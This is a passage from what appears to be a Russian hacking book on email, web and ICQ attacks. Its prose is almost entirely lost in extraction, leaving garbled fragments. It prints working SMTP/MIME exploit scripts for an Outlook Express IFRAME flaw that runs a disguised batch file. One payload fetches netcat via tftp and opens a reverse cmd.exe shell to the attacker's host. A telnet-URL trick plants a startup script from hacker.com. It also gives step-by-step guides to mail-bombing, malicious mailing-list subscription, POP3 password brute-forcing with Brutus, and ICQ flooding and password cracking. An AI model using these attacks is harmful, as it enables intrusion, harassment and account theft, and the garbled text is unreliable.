URL. HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .
- ?
, , SSL ( TSL)
Web-.

XakuHzSSL
SSL (Secure Sockets Layer - ) ,
Web.
, .. , -
, . IE , , SSL,
http:// https://.
Web,
, .

8. Web

127

, - . , /
.
- : - Web
. -, , , ,
Web- SSL-. , ,
, . -,
Web,
128- ( , D). IE ,
IE 56-
,
Web-.
- ? : . , . , [3]
SSL, IE 4: SSL , . ,
, IE, IE, .
, [3].


, , ,
, Web . .
, , , Web.
,
Web-
. .
-,
,

128

-
, , .
.
, ,
.
Windows 2000/XP, 14.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .

Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.

9.

Xakutig
- ,
. , ,
-
, , .
, . ,
,
, Web-. , .

kogoM
, Web-. WWW,
, ,
, 1, , , . , - , ... , ,
, .
[3]
. ,
, Web- , . ,
, . . .

1
FIDO. mail ().
5-1687

130


.
: _@_, _ - () , _ . , , , .
SMTP,
POP IMAP, , ,
TCP/IP.
SMTP (Simple Mail Transfer Protocol -
) .
POP (Post Office Protocol - ) - .
IMAP (Interactive Mail Access Protocol -
) - ,
POP, .
:
, , , vasia@email.com
, . ( ).
, , , vasia,
, , petia , ,
petia@post.com, POP ( IMAP) email.com
( ).
email.com .
:

, petia.
, .

,
email.com DNS
post.com petia (
).

9.

131

petia POP ( MAP) , , .


, .

XakuH2
,
: -, ; , . POP 3
() , . - SSL/TSL (
). -
, (
17).
- ,
SMTP. , , SMTP, . (, Outlook Express), , , , .
.

,
.
, , ,
, ,
.
, ,
. ,
- .
,
,
,
. , .
5'

132

, .
- .. ,
, .
- , ,
,
, ,
IE, (
). - , ,
, ,
, , .
- . , , ,
-, . ,
-
, , , ,
Windows, ,
, .

, -
.
, .
, .., ,
, , ,
, .


RFC 2822.
, ASCII . ,
( ), , ASCII ( ). <CRxLF>, ( 13) ( 10).
. .
:
_:
:

9.

133

Subject:
, (Subject) () . , , :
Subject:



...
- 998 ,
78 .
, , .

From

, :
vasia@email.com, : "Vasia Lohov " (vasia@email.com).

Reply

-
, From.

, , .., From .

Subject

Date

, , Sat.16 Jun 2003 15:34:17+1000

Message-ID

, , :
<3.0.4.44.30445445754533.0035@email.com>

Received

, .

, , Outlook Express,
-
, . ,
.

134


.
. - TCP/IP Ethernet, Windows 2000/XP. :
Windows 2000 Server Sword-2000 - 1.0.0.1
Windows XP AIex- IP- 1.0.0.5
Windows 2000 1-1 IP- 1.0.0.7
sword.net,
: Sword-2000 sword2000.sword.net., AIex- - alex-3.sword.net,
1-1 - alex-1 .sword.net. 1-1 AIex- :
1-1 kolia@alex-1.sword.net,
AIex- - , petia@alex-3.sword.net.
, - , - .
, , , . ,

. ,
.
-
, .
9.1 ,
JMail 5.01.
9.1.
Received: from alex-l.sword.net [1.0.0.7] by alex-3.sword.net
with ESMTP
(SMTPD32-5.01
+ 0200

EVAL)

id

A4A7502B6;

Thu,

16

Jan

2003

14:25:11

Received: from alex-1 [ 1 . 0 . 0 . 7 ] by alex-l.sword.net


(SMTPD32-5.01 EVAL)
id A76080152; Thu, 16 Jan 2003
+0200
Message-ID: <008601c2bd52$6682eeeO$07000001@sword.net>

13:28:32

9.

135

From: "kolia" <kolia@alex-l.sword.net>


To: <petia@alex-3.sword.net>
Subject: Congratulations
Date: Thu, 16 Jan 2003 13:28:32 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
X-RCPT-TO: <petia@alex-3.sword.net>
X-UIDL: 7
Status: U
Happy New Year!
, , - , Content-Type, , ( ).
(Multipurpose Internet Mail
Extensions - ).
MIME ,
.

MIME
, ,
, , , , MIME
: Content Type:, Content-Transfer-Encoding: Content-Disposition:. MIME MIME-Version:, MIME,
- 1.0,
:
MIME-Version:1.0
Content-Type :
Content-Type: /; =; ...
/ ,
MIME MIME-. , MIME- .

1 36

text/plain
text/html

( HTML). :
1=_/)(/7_/
, charset=koi8-r ;
charset
us-ascii, .. ASCII.

image/jpeg
image/gif

image/gif

audio/x-realaudio

() , , Content-Type:
video/mpeg

Content-Type:

video/mpeg
video/quicktime

, , Content-Type: video/mpeg

application/postscript
application/msword
application/zip
application/octetstream

( application)
, ,
octet-stream --
:
Content-Type: octet-stream

multipart/mixed
multipart/related
multipart/alternative

multipart - MIME-, , ,
. mixed, related, alternative , , , , .

Content-Type-Encoding :
Content-Type-Encoding:
,
, .
7bit - us-ascii, 8-bit - ,
binary - , quoted-printable -
, base64 - ,
Base64 (RFC-2045).
Content-Disposition
, , , .
:
Content-Disposition: inline; filename="image.gif"

9.

137

inline , , filename
, - .
attachment , .
, , , , .
.

omnpaBka
,
MS-DOS, . ( ) , Outlook Express.
, . , 9.1,
X-Mailer: , , ,
Outlook Express 5.00. , ,
, - 5.00 ,
, .
(Notepad) 1-, 9.2,
Attack-hello.txt.
9.2.
-
hello sword-2000.sword.net
mail from: <petia@alex-3 . sword.net>
rcpt to: <kolia@alex-l . sword. net>
data
subject: Attack
MIME-Version: 1.0
Content-Type:
multipart /related;
type="multipart/alternative11;
boundary = " 1 "

Content-Type: multipart/alternative; boundary =" 2

--2
Content-Type: text/html; charset="iso-8859-l"
Content-Transfer-Encoding: quoted-printable

138

Content-Disposition: inline;
<HTML>
<HEAD>
</HEAD>
<BODY >

<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>


This message uses a character set that do not supported
by the Internet Service. Please disregard. <BR</IFRAME>
</BODY>
</HTML>

Content-Type: audio/x-wav; name= "hello. bat"


Content-Transfer-Encoding : quoted-printable
Content- ID: <THE-CID>
echo off
dir c:\
echo "Your system has a problem! "
pause

quit

,
MIME- , 9.2, -1 -2 .
MIME .
- SMTP, SMTP, - , ,
. hello ,
sword-2000.sword.net. mail from , , rcpt to
, 9.1. Received:. data, .

9.

139

9.2 ,
1, MS-DOS
: .
,
HTML, IFRAME
:
<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>
This message uses a character set that do not supported
by the Internet Service. Please disregard.<BR</IFRAME>

src=3Dcid:THE-CID, , Content-ID: <THE-CID>.


, - .
- MS-DOS:
echo o f f
dir c : \

echo "Your system has a problem!"


pause
- audio/x-wav - ..,
,
MS-DOS. , ,
5.00 ( 5.50 6!)
, , ,
!
. , MS-DOS:
type attack-hello.txt | nc -vv sword-2000.sword.net 25

- . (http://www.atstake.com), , netcat . ; , netcat attack-hello.txt


SMTP- sword-2000.sword.net, 25.
, , , , , MS-DOS
(. . 9.1).

140
2^1 - Outlook Express

Outlook Express

|...^a
i (^?
L...^}

C:\>echo off
.
, : C01B--81FO
:\

06.12.2002
22.12.2002
13.01.20
06.01.2003
i . 06.01.2003
! 16.01.2003
''.
26.12.2002
12.01.2003
[; I, ||

11:57
<DIR>
13:02
<DIR>
11:07
<DIR>
14:42
<DIR>
14:54
<DIR>
12:24
<DIR>
12:57
<DIR>
14:12
<DIR>

8
1 358 456
"Vour system has problem?"

IFT
. 9.1.
, MS-DOS,
, - ,

:\ Your system has a problem ( ). , ,
-
MS-DOS!
, ,
. , -
, , ,
. , - - , -.


,
: -
(, ) , .
- -
.

9.

_ 141

TFTPD32, - .
- netcat.
MS-DOS, , netcat, . .
attack-tftp.txt MIME-, 9.3.
9.3.

hello alex-l.sword.net
mail from: <petia@alex-3 .sword. net>
rcpt to: <kolia@alex-l. sword. net>
data
subject: Attack
MIME- Version : 1.0
Content-Type:
multipart/related;
type="multipart/alternative";
boundary ="1"
X_Priority: 3
X-MSMail-Priority: Normal
X-Usenet : 1
Content-Type: multipart/alternative; boundary =" 2 "

2
Content-Type: text/html; charset="isc 8859-1"
Content -Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY
bgColor=3D#ffffff>
<IFRAME src=3Dcid:THE-CID height=3DO width=3DOx/IFRAME>
, . <BR>
. <BR>
</BODY>
</HTML>

Content-Type: audio/x-wav; name=" attack. bat"


Content -Transfer-Encoding : quoted-printable

142 _
Content-ID:

<THE-CID>

start / /WAIT tftp -i alex-3.sword.net get nc.exe


C: \winnt\system32\nc .exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002

quit

:
start / /WAIT tftp -i alex-3.sword.net get nc.exe C:\winnt\system32\nc.exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002
. MS-DOS MS-DOS
( / start) ( /WAIT start). MS-DOS
tftp, ( put)
( get). ( tftp Windows 2000/XP.) tftp ( -i) nc.exe alex-3.sword.net c:\winnt\system32 .
- netcat,
cmd.exe
- netcat, 2002.
. attack-tftp.txt - 9.3, .
Alex- TFTPD32,
TFTP, .. , TFTP.
TFTPD32 , Windows 2000/XP,
UNIX, TFTP ,
tftp ,
, tftp - .
, TFTPD32 ,
. 9.2.
TFPD32 . Base Directory
( ) nc.exe,
Server interface ( ) IP-
, , - Alex-. . 9.2, TFPD32 69 TFTP
.

9.

143

TFTP032 by Ph. Joumn


Base Directory

[CAtestSnetcat

Serve!inleiface [ 1 0 0 5

Current Action

[listening on port E9

About

Help

Settings

Puc. 9.2. TFTP - TFPTD32


MS-DOS - :
nc -vv -L - 2002
listening on (any) 2002 ...
netcat, , 2002, .
. MS-DOS
1-1
SMTP- sword-2000.sword.net :
type attack-tftp.txt | nc -vv sword-2000.sword.net 25
Outlook Express 5.00
( 1-1
MS-DOS), TFTPD32 , . 9.3.
. TFTPD32 by Ph. Jounin
Base Directoi)i | C:\test\netoat
Server interface [1 Q.rj.5
Connection received from 1.0.0.7 on port 1125
Read request (or file <nc.exe>. Mode octet
<nc.exe>: sent 118 blks, 5932 bytes in 1 s. 0 blk resent

Current Action
About

[Listening on
Settings

\_

Help

. 9.. !

144

MS-DOS,
netcat,
1-1 (. 9.4).
" Command Prompt - nc -vv -L -p 2002
C:\test\netcat>nc -uv -L -p 2002
listening on l&nyH 2002 ...
DNS fwd/rev mismatch: ftLEX-1 T = fiLEX-l.sviord.net
connect to [1.0.0.51 from ALEX-1 [1.0.0.71 1274
Microsoft Windows 2000 [ 5.00.21951
<C> , 198S-1999.
C:4>ipconfig
ipconrig
IP Uindous 2000
Ethernet :
DNS
IP-
. . . . . . . .

1.0.0.7
255.0.0.0

. 9.4. -
, - , . 9.4
ipconfig, IP- ,
. - , ,
- , 1-1
! - !
- ,
,
.

BcmaBku koga
[4]:
.
, - .
.
.
.
.

9.

145


[4] , . , ,
. , 2000
, GMT.
,
IMAP. Service Pack 1 Windows 2000.
, ,
.vcf ( vCard) .asx ( Media Player).
[3] - , .


- , , - ..
. ,
, ,
,
-, MS Office (, - !) . - ,
,
.
, -
!

AokaAbHbix
, , , ,
,
. ,
, Web-, . HTML , ,
, , ,
8. Web- (Georgi Gunninski) http://www.guninski.com.

146

Omkpbimue
,
- - , -,
.
, , hacker.com, netcat
:
nc -n -L - 80 -t -w 1 < attack.bat
netcat TCP 80,

attack.bat .
netcat,
HTML, :
<raroe src=telnet:-f
%20"Document%20aiid%20Setting\aAll%20\Users\start%20inenu\
programs\startup\start.bat"%2Ohacker.com%20 8 0 >

,
, .
telnet, telnet,
, Windows 2000, SFU 2.0 (Service for Unix - Unix). f:, telnet.
telnet SFU :
(Address) IE URL telnet:-f%20\filename.txt%20 host
IE - filename.txt. , telnet ,
start.bat
attck.bat. start.bat - !
- telnet SFU 2.0,
. , ,
.

\I\I\I\IM\I

, , -

9.

147

Microsoft - , . .
, , Web-, ,
Hotmail Microsoft (http://www.msn.com) Yahoo
(http://www.yahoo.com). Web-, ,
, , Web .
Web-, .
, , , , -,
, Received:
(. 9.1) ,
( ). -, WWW
.
WWW ,
, , .
, Web- , ActiveX - . 8.
...

, ? , ,
:
, .
.
- , , .

.
, , .
-
. 1 - .

10.


9 , ,
, .
, , , ,

. ,
, ,
,
,
.


, . , , 9, .
, , , ,
,
... , - !

- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..

10.

149

), , ,
.
, SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - . Avalanche DnD, .
. 10.1 DnD 4.O.
-inixi
Clones

Headers

Session

Random Listi

Send bomb to:


Say bomb is from:
Message Subject: |

Message Body:

Send Bomb;

Edil Headers

Abort

Mailing Lists

Window

Extiat

Help

Email Bombing is rarely damaging


the target but is always
damaging to smtp hosts. I do NOT
condone mailbombing as it
causes problems for SysAdmins of
71 0 Randomly Change | EditLisI
servers. I did not make this
program for people to blast away
I 0 Randomly Change [ Edit List | at each othei. PLEASE use it
responsibly, and if you HAVE to
email bomb, then please use the
option to fandomly switch servers
in between messages; as it
lightens the loads on the server.
Have fun and don't ruin a good
sysadmins time by flooding his
server!
Clear
Clone

Selling
SMTP Host: I
8

Spoof Host: I

Ed

"Se'"e'fel

of messages to send:

o Neve, endng bomb

|| Remember to use the Edit Headers option'

Puc. 10.1. DnD


DnD, , 1-1
, . , ( ).

150


.
.


DnD Settings
(), DnD (. . 10.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,
SMTP.
> SMTP-,
Edit Server List ( ).
Random Server List ( ),
. 10.2.
if Random Server List
|orca.esd114.w | [mw.highwayVc
||stjohns.edu

malasada.lava.

interconnect.ne| |hoiizons.net

lpfessenter.com | [cybefhighway.nj

1 mail, sisna.com j why.net

[widowrnaker.col |clubmet.metrob|

|wwa.com

| clinet.fi

| (cablefeginaco [

Jsoi.hyperchal.c | |dagoberUz.uni-

|space.net

| |maple.nis.net

ltka.com

|clubmet.metfob| |[Mvl.nel

ih2000.net

| [nyx1Q.cs.du.ed

| | plx.com

|
|

. 10.2. SMTP-
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 10.1) :

10.

151

# of messages to send ( )
.
10.
Never ending bomb ( ) .
, . , . E-Mail bomb ( ).
> Send Bomb to: ( :) , kolia@alex-1.sword.net.
> Say bomb is from: (, :) ( , ) . From ().
, Randomly Change ( ) , .
Edit List ( ).
> : () , , .
> Message Subject ( ) .
, Randomly Change ( )
.
Edit List ( ).
> Message Body: ( :) .
> , Random () - Message Body
( )
. , -
.
Abort () ,
Clear () - E-Mail bomb ( ).
.
> Send Bomb ( ) . ,
. 10.3.

152

Number of messages to be sent:

10

Number of messages sent so far:

10

Number of messages left to send:

Time when bomb started:

13:36:52

Time when bomb finished:

13:35:57

...SMTP Spy j| Mote: This only applies to the main bomber form.
Bomb completed!

11111

l
l
I

Puc. 10.3. Countdown ()


, Countdown () , 10
, . , SMTP, , SMTP Spy ( SMTP)
SMTP Spy ( SMTP), . 10.4.

250 hello sword-2000.sword.net

250 ok
250 ok its for <kolia@alex-3.sword.net>
354 ok. send it; end with <CRLF>.<CRLF>
250 Message queued

gnore "Command unrecognized" and "need MAIL first". As long as


you get a "message accepted for delivery" its fine. I Close SpyI

Puc. 10.4. SMTP- !


SMTP Spy ( SMTP) DnD
( DnD SMTP- - !) .
SMTP ( ), Email bomb ( ) (. 10.1) -
MIME- Headers (),
Edit Headers ( ) . 10.5.

153

10.
Check the box and Ihen fill in the information that wit! appear in the
headers under that category; 01 uncheck the box to remove it from
the headers.
X-Maiter:
X-URL:
X-Sender:
X-Date:
Return Path:

References:
Priority:
X-Aulhentication Warning

Generate IP |

Custom

21.43.153.80 ]

Ok

JTedGilsdorf

Cleat

Cancel

Puc. 10.5. MIME


, ,
MIME , 9.
- DnD
,
, .

Amaka
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 10.6.
, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .

154
Bomber Spawn I

Send bomb to:


Say bomb is from:

0 Randomly Change

Message Subject:

Random

Message Body:

SMTP Server:

|, | 0 Randomly Change
Abort

Clear

[Status
[Messages Sent! [5_

Puc. 10.6.
, , ( - ).
> , DnD Clones * Load Multi Clones ( *
). Number of clones ( ),
. 10.7
Number of clones
How many clones do you want to load?

L
Puc. 10.7.
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!

10.

155

cnuckaMu paccbwku
! , - ,
! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 10.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!

Subscribe joe lamei to a mailing list!

Subscribe your enemy to a mailing list even worse then a mailbomb!


More lists coming next version..sorry for the smalt quantity this time.
My apologies for the bad usability but I will use checkboxes instead of option boxes
next version..
Jewish List

Child Parenting

Targets email address:

Digital Queers

Gay Quakers

Targets first name:

jj0hn

Mormons

Christianity

Targets last name:

|Doh

Gay/Lesbian

womanism

Lesbians over 40

Bi Australians

Euro Queer

Blind people

Family Medeeine

Allergies

Subscribe em

Puc. 10.8. DnD



DnD
. Target
Email Address ( ), Subscribe em
() - . , .


,
, DnD , ,
, . ,
Extras * Pword generator ( * ).
Randomic Password Generator ( ), . 10.9.

156

, How many characters? (


?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - Use letters ( ) - . -
, ,
.
( Randomic Passwoid Geneiatoi
Just click to generate a random password. Choose how long
you want it to be by the number of characters.
How many characters? |ig |
Use Both Use numbers Use letters
S2j9e1m5p8i
Generate

Close

Clear box

Puc. 10.9.
Extras () -
SMTP- ( SMTP Remote (
SMTP)), ( Raw Port
( )). , ( , SMTP).
Other Tools ( )
.
- , , .
, - ;
. ,
, . , ( ). , .

k


. , ,
- (

10.

157

IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 10.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
1 X Biulus - 2 - www.hoobie.net/biutus - (January 2000)
File

Tools

Target
_

|l 27.0.0.1
.

Poit [
T-.I-.I-,~. ^

Help
|

Connections 1 10
'

Type |

meout

[ | Start | Stop [dear

yiHIIIIWfni IU

|_J Use Proxy [ pare |

|i Modify sequence!]

Try to stay connected for fiJnlimite \*\ attempts

0 UseUsemame

Pass Mode I Word List \*\

[] Single User

User File jusers.txt

1 | Browse |

Pass File

[words.txt

| | Browse |

Positive Authentication Results


Target

I Username

I Type

[ Password

Located and installed 1 authentication olua-ins

II

UZ

II

TiAout

Reject

AuthSeq

III*

Throttle Quick ICi

j.

Puc. 10.10. Brutus


,
Brutus ( 12
Brutus IIS). , alex-1.sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 10.10) Target () , alex-1 .sword.net.
> () ,
.

158

>- Connection Options ( ) Use Proxy ( ),


-
.
> Authentication Options ( ) Single User ( ) -
.
> User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 10.11.
1 X Biulus - AET2 - www.hoobie.nel/biutus - fJanuaiv 20001
File

Tools

arget | alex-1 . sword, net


/-.

Help

Type|POP3

|" | | Start | Stop [dear

.-

Timeout ^

i 10 fj Use Proxy | Dare |


Connections

Port |110
P.,-..-.^.n .

| Modify sequence |

Try to stay connected for Unlimite l^l attempts

0 Use Username

0 S'n3le User

UseilD

jkolia

Pass Mode JBrute Force j" J |j Range j| | OfettibOed |


] JBiowse|

PawFte

iKl

||.|

Positive Authentication Results


Target

Type

MUVMVIIIIIIMi|.miL

II

J Password

^^^_

^^^
V%
I

I Username

Timeoul
II

Reject

AulhSeq

III*

Thro8

Quick K

Puc. 10.11. Erutus POPS



Range (). Range () Brutus Brute Force Generation (Brutus - ),
. 10.12.

10.

159

Digits only

Min Length

|3

Lowercase Alpha

Length |4

Uppercase Alpha

OK

Mixed Alpha

Cancel

Alphanumeric
Full Keyspace
Custom Range [etaoinsrhldcumfpgwybvkxjqzl 234567890! |

Puc. 10.12.
Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 10.13.
X Biulus - 2 - www.hoobie.net/biutus - (January 20001
File

Tools

Help

Target [alex-1. sword net

[>j | Start | Stop [ Clear)

Type [POP3

onnection Options
Port [110

Connections

10

! 10 Timeout

Use Proxy | Define

-POPS Options
[ Modify sequence |

Try to stay connected for

l^] attempts

-Authentication 0 ptiom
7| Use Usemame
UserlD

Pass Mode | Brute Force j^] | Range 11 Distributed

j Single User

[kolia

Positive Authentication Results


Target
alex-1.sword.net

| Type

I Username
kolia

I Password
0007

Positive authentication at alex-1 . sword, net with U ser : kolia Password : 0007 1 0997 attempts
Timeout
10997

J|U:kolia P:0000

Reject

AuthSsq

Throttle Quick Kl

||37 Attempts per second

Puc. 10.13. !

160

Positive Authentication Results (


) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
). -, , , ( 8 !),

, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.

. , , , , ,

10.

161

, . .

- , .
IIS Brutus 12 ,
- . ,
, . , , ,
- , -
! :
!. .


, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
6- 1687

162

,
.

. , ,
( ) . ,
, , Web- - .. ( ,
). . - , , , IP-.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
, .
repa_parenaia, - !

10.

163

- . , , ,
,
. - , , ,
- , . .
, - .
,

. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .

- - , .

11.

XakuHzlCQ
ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ .
ICQ ,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ - ICQ , , 1998, 1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UIN -
ICQ , .
, ICQ?
ICQ ,

. , ? .

. ICQ

165

AcbkuHbi
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 13 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ ,
.
,
.

166

ICQ
,
, ,
, ,
.

, /. .
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UIN, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .

11. ICQ

167

UIN
UIN ICQ- ULN ICQ, , UIN . UIN

. ,
, - .
- - , .
, , .
( ) LameToy for ICQ
(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ.
. 11.1 , LameToy
for ICQ.
LameToy For Icq [DBKILLER]
Send I

Slop | | Updatel | Menu | | Hide ||

Loser -

|UINtt|1001
Passwdl

]
Exit

-Setting

1 |Nick |

lErnaill

II URL |hlto://

Messsage

v|g Engine: Successfully sent 7 message 1

Puc. 11.1. LameToy for ICQ (DBKILLER)


ICQ

LameToy for ICQ (DBKILLER) -
Send (). , Setting
() Loop () ,
. TJIN,
UIN# - Ran (Random- ). ,
, , , .

168

, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/soft_icqteam.shtml), ICQ Sucker
.

IP- ICQ-knueHma
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/softjcqteam.shtml).
. 11.2 Advanced ICQ IP Sniffer.
_ falxll

Advanced ICQ IP Sniffer

You UIN (207685174

| Passwofd:|"""""

UIN to check |1 234567891


Check

| ||

Clear list

About

Server

Timeout. Try again.

Ext IP:

Status:

| TCP Rag

Int IP: |

TCP Port: |0

| TCP Version: |0

Puc. 11.2. - IP- ICQ


IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer ( IP
ICQ). Check ()

. ICQ

169

, ICQ
UIN , Info
() .
, Info () . 11.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( IP), Int
IP ( D?) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port ( ICQ),
Server () . 11.3.
llCQ server's address and port
Address: |icq.mitabilis.com
Port

[4000

| | OK |
|

Cancel

Puc. 11.3. ICQ server's address and port


( ICQ)
ICQ server's address and port (
ICQ) Mirabilis
ICQ - 4000. ,
/ IP- /
.

ICQ-
ICQ, , , ICQ-,
ICQ-
ICQ. , , . ,
ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 11.4).

170
File
Victim's address: 127.0.0.1
El Randomly generated UIN
Apparent source UIN:
No. of Messages: |1
Message:
Eat this!

ICQ Flooder 1.2 Copyright (C) 1998 dph-rnan and Implant Man

Puc. 11.4. ICQ


ICQ Flooder, .
> Victim's address ( ) -
ICQ.
> ICQ-port ( ICQ) TCP.
> , UIN .
:
UIN - Randomly generated UIN
( UIN), UIN UIN.
UIN - Apparent source UIN
. ( UIN ) UIN, ICQ .
> No. of Messages ( ) ICQ-.
v Message () (- , ).
> Send! () .
- , ICQ, , - , ,
http://mht.hut.ru/icq/icq.html,
( , , -

. ICQ

171

ICQ , ). ICQ - ,
, , -
!

ICQ
IGQ,
ICQ, ,
. ,
, .
brute
force - , ,
.

.
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 11.5.
ICQ SubMachineGun v1.4 by uD
File Settings About

(c):UD. Moscow 2001

Puc. 11.5. ICQ subMachineGun


UIN ICQ

172

ICQ ICQ subMachineGun


.
> ICQ subMachineGun.

> Settings * Connections&Cracking (&). , . 11.6.

[ Cracking ]
0
0
0
0

Stop if successful...
Make log of cracked uins
Reconnect if timeout
Cut passwds length to 8 digits

set timeout:
relogin :

times
Cancel

OK

Puc. 11.6. UIN


> icq server ( ICQ) ICQ,
, ICQI.mirabilis.server.
> port () 4000.
> Cracking ()
:
Stop if successful ( )
ICQ.
Make log if cracked uins ( UIN) ICQ.
Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .

. ICQ

173

> relogin ( ) ICQ


3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single () UIN, .
Single () UIN.
> UESf,
(...) Making victims list ( ),
. 11.7.
100000
100100
100200
100300
100400
100500
100600
100700
100800
100900
101000
101100
101200
101300
101400
101500
101600
101700
101800
Starch
101900
102000
Clear
102100
102200
Cancel
102300
Hint: use De! to remove uins from list

Puc. 11.7. UIN


Making victims list ( ) Range
() , , UIN ( - 100000) ( 900900).
step () UIN ( - 100).
Generate () UIN;
.

174

, Generate ()
- UIN, , , ..
Add () UESF .
>

UIN,
Open () UIN ( UIN ).

> - UIN ,
I0**18]. Clear () UIN ( ).
UTN,' .
.
>

ICQ subMachineGun Bruteforce ( )


. .
Single () , .
Single () .

> ,
(...) Make passlist (
), . 11.8.

. 11.8.
Make passlist ( )
.

. ICQ

175

> Open ()
( ).
- ,
ICQ.
> Generator ()
Add (). , .
> , I08'"'!. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 11.9).
OICQ SubMachineGun vl.4 by uD
File _ Settings About

'_ Bruteforce ]
2076851747

FT] 0 Single
~| Single
,cotn:4000
51747 pass
51747 pass
i 1747 pass
J1747 pass
J1747 pass
J1747 pass
J1747pass
51747 pass
J1747 pass

pass,..timeaut,re!ogin
pass... timeout.retogin
pass... timeout.relogin
pass... timeout.
password.,. timeout,refogin
password... timeaut,re login
password... timeout.re login
password,,, timeout.

Puc. 11.9. -

ICQ subMachineGun v1.4,
UIN, ( , . 11.9 ). , , 15 , ICQ.

176

- 45
, ( ). ,
, , , , .. - .
...

ICQ-kpkep
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
?
,
Windows.
,
2 . , ICQ ,
ICQ. ICQ-, , ElcomSoft
Advanced ICQ Password Recovery (http://www.elcomsoft.com).
, .
. 11.10 Advanced ICQ Password Recovery.

-Status Window
31.01.200314:12:05- ACQPR1.0 launched, registered version

1 () 2000 Olegjjgriunovand Andy Malvshev. ElcomSofl Co. L

Puc. 11.10.
ICQ .dat

177

. ICQ

